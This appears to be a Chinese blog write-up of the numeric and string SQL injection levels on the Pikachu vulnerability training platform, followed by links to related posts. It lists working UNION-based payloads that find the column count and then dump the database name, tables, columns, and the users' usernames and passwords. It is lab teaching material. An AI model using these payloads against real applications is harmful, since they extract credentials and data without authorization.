一.数字型注入

目录

一.数字型注入

二.字符型注入

在burp抓包

使用reprter注入

  1. 找列数id=2 order by 2# &submit=%E6%9F%A5%E8%AF%A2,如果猜测的列数大于select语句查询的结果的列数,会返回报错。

  1. 爆库,id=2 union select database(),2# &submit=%E6%9F%A5%E8%AF%A2,上一步知道了有两列,浏览器的返回结果有用户名和邮箱。当前数据库是pikachu

  1. 爆表,id=2 union select group_concat(table_name),2 from information_schema.tables where table_schema='pikachu'# &submit=%E6%9F%A5%E8%AF%A2

4.爆列,id=2 union select group_concat(column_name),2 from information_schema.columns where  table_name='users' and table_schema='pikachu'# &submit=%E6%9F%A5%E8%AF%A2

  1. 爆数据,id=2 union select username,password from users# &submit=%E6%9F%A5%E8%AF%A2

二.字符型注入

1.找列数,ccc’ order by 2#

2.爆库,ccc’ union select database(),2#

3.爆表,ccc' union select 1,group_concat(table_name) from information_schema.tables where table_schema = 'pikachu' #

4.爆列,ccc' union select 'aaa', group_concat(column_name) from information_schema.columns where table_name = 'users' and table_schema = 'pikachu' #

5.获取数据信息,ccc' union select username,password from pikachu.users #

pikachu SQL 注入(皮卡丘漏洞平台通关系列)相关推荐

  1. pikachu SQL注入 (皮卡丘漏洞平台通关系列)

    目录 一.官方的戏精引言 二.仙女在认真闯关 一重天 数字型注入 二重天 字符型注入 三重天 搜索型注入 四重天 xx型注入 五重天 insert/update注入 (1)insert注入 (2)up ...

  2. pikachu File Inclusion 文件包含漏洞 (皮卡丘漏洞平台通关系列)

    目录 一.来自官方的简介 二.来自小可爱的通关步骤 第一关  File Inclusion(local) 1.读取"隐藏"文件 2.读取系统文件 3.结合文件上传getshell ...

  3. pikachu RCE(remote command/code execute)(远程命令执行/远程代码执行)(皮卡丘漏洞平台通关系列)

    目录 一.官方介绍 二.诚意推荐 三.悠闲通关 第1关 exec "ping" 第2关 exec "eval" 一.官方介绍 本节引用内容来源pikachu漏洞 ...

  4. pikachu XXE (XML外部实体注入)(皮卡丘漏洞平台通关系列)

    目录 一.来自官方的介绍以及来自民间的扩展 1.pikachu官方简介 2.小女子之前画的脑图 3.两个不错的博客 二.小白菜的闯关 1.查看系统文件内容 2.查看php源代码 3.爆破开放端口 三. ...

  5. pikachu XSS Cross-Site Scripting(皮卡丘漏洞平台通关系列)

    目录 一.听pikachu介绍xss 二.羞耻又走心的推荐 三.比较EASY的闯关 第1关 反射型xss(get) 1.阳关道 2.独木桥 3.第三种方法 第2关 反射型xss(post) 第3关 存 ...

  6. pikachu Unsafe Fileupload 不安全的文件上传(皮卡丘漏洞平台通关系列)

    目录 一.client check 客户端验证 1.现象 2.绕过姿势 方法一.浏览器禁用javascript 方法二.burpsuite抓包改后缀 3.问题分析 二.MIME type 1.现象 2 ...

  7. pikachu Over permission 越权(皮卡丘漏洞平台通关系列)

    目录 1.水平越权 (1)闯关 (2)原因 (3)防御 2.垂直越权 (1)闯关 (2)原因 (3)防御 3.尾声 这关也挺简单 1.水平越权 也称为横向越权,指相同权限下不同的用户可以互相访问,比如 ...

  8. pikachu 暴力破解 Brute Force(皮卡丘漏洞平台通关系列)

    目录 一.官方概述 二.小白菜的通关 第一关  基于表单的暴力破解 第二关  验证码绕过(on server) 1.绕过步骤 2.一点思考 第三关  验证码绕过(on client) 1.绕过步骤 2 ...

  9. pikachu Unsafe Filedownload 不安全的文件下载 (皮卡丘漏洞平台通关系列)

    这关也几乎是一步就能搞定 1.轻松过关 进入本关看到下图的页面,点击球员名字可以下载头像图片 点击之后直接下载了,没有页面跳转,地址栏的url没有变化 右键 查看网页源代码 通过球员名称快速定位到相关 ...

最新文章

  1. MATLAB编写ode文件,MATLABODE45问题M文件为br/functiondq 爱问知识人
  2. 全球IPv4地址正式耗尽,你知道吗?
  3. ai字体行间距怎么调整_字体基础知识(一)
  4. 计算机辅助普通话水平测试评分办法,计算机辅助普通话水平测试评分试行办法...
  5. Maven+Mybatis+Spring+SpringMVC实现分页
  6. Quartz.Net 学习随手记之03 配置文件
  7. 关于Jbulder2006的问题
  8. 如何在Python中获取文件创建和修改日期/时间?
  9. JS、PHP输出语句。
  10. ArcGIS土地利用重分类(一)简单的reclass by table方法
  11. FFmpeg合并ts文件为mp4文件
  12. 微服务Spring Boot 整合 Redis 实现好友关注 – Feed流实现推送到粉丝收件箱
  13. Creator动态获取,数据文,JSON并使用,枚举Enum,cc.sys.localStorage获取音效的判断 ,冒泡排序做排行榜 ,动态获取提示(cc.loader.loadRes),制作签到
  14. java 月份适配计算_Java8中的时间日期API这么好用,你居然还没有掌握?
  15. android 7.0原生room,小米5S 安卓9.0 原生体验 LineageOS16.0 ROOT
  16. 企业被抽到高新现场审查怎么办?深科信教你做好这些准备
  17. 企业管理软件如何选型?看完后恍然大悟
  18. 做网站windows和linux哪个好,做网站永Linux系统服务器到底有什么优势?
  19. 学英语的网站[转载]
  20. 台式机键盘鼠标失灵,无法输入密码,无法登陆电脑

热门文章

  1. Spring Boot配置log4j记录日志
  2. 计算机里s大小,衣服上的S,M,L代表m或l多大
  3. python自动翻译excel某一列_python批量将excel内容进行翻译写入功能
  4. 响应国家十四五规划,ABeam(德硕)科技赋能可靠股份数智化转型
  5. android常用api大全,Android开发个人总结常用的api
  6. jquery ready vue_我在切换路由器$(document).ready()失败时在模板中使用vue-router和jQuery...
  7. K8S报错network is not ready: container runtime network not ready
  8. 数据分析八大模型:漏斗模型
  9. 【博学谷学习记录】超强总结,用心分享 | 产品经理之B端相关概念及业务流程设计
  10. java逆波兰式求值_波兰式、逆波兰式与表达式求值